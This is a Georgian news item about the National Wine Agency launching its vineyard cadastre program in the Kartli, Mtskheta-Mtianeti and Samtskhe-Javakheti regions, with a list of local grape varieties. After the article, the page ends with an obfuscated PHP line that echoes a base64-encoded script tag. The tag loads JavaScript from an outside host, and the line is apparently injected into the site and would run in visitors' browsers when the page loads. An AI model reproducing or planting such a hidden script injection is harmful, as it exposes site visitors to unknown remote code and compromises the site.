celsiusi
ავერსი შნაიდერი
ღვინის ეროვნული სააგენტო ქვემო  და შიდა ქართლში, მცხეთა-მთიანეთსა და სამცხე-ჯავახეთში ვენახების კადასტრის პროგრამის განხორციელებას იწყებს.  
პროგრამის დეტალები და მნიშვნელობა ღვინის ეროვნული სააგენტოს თავმჯდომარის მოადგილემ, ზურაბ ვაჭარაძემ და მევენახეობის კადასტრის სამმართველოს უფროსმა, დავით მაღრაძემ აღნიშნული რეგიონების ადმინისტრაციების ხელმძღვანელ პირებთან გამართულ სამუშაო შეხვედრებზე განიხილეს. ინფორმაციას ამის შესახებ ღვინის ეროვნული სააგენტო ავრჩელებს. 
 
"აღინიშნა, რომ ვენახების კადასტრის პროგრამის განხორციელება მნიშვნელოვანია მევენახეობა-მეღვინეობის დარგის განვითარებისთვის; კადასტრის შექმნა რთველის პროცესის გამარტივებასა და ყურძნისეული პროდუქტების ხარისხს უზრუნველყოფს. შეხვედრაზე, ადგილობრივი ხელისუფლების წარმომადგენლების მხრიდან, პროგრამის განხორციელების პროცესში, კომპეტენციის ფარგლებში, ჩართვის სრული მზადყოფნა გამოითქვა.
 
ქართლის, სამცხე-ჯავახეთისა და მცხეთა-მთავნეთის რეგიონები  ცნობილია ვაზის ჯიშების მრავალფეროვნებითა და უნიკალურობით. აქ გავრცელებული ჯიშებიდან აღსანიშნავია ჩინური, გორული მწვანე, ბუდეშური თეთრი, თავკვერი, შავკაპიტო, ასურეთული შავი, ასევე, იშვიათი ჯიშები: ძელშავი, ჭყაპა, დანახარული, მელიკუდა ქართლის, ჭროღა და სხვა. გარდა ადგილობრივი ჯიშებისა, ქართლში გავრცელებულია ისეთი უცხოური ჯიშებიც, როგორებიცაა ალიგოტე, პინო შავი, თეთრი და სხვა."–წერია გავრცელებულ ინფორმაციაში.   
 
ცნობისთვის, ვენახების კადასტრის პროგრამას ღვინის ეროვნული სააგენტო 2014 წლიდან ახორციელებს. გასულ წელს, პროგრამის ეტაპი კახეთისა და რაჭა-ლეჩხუმის მევენახეობის რეგიონებში დასრულდა.
785
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");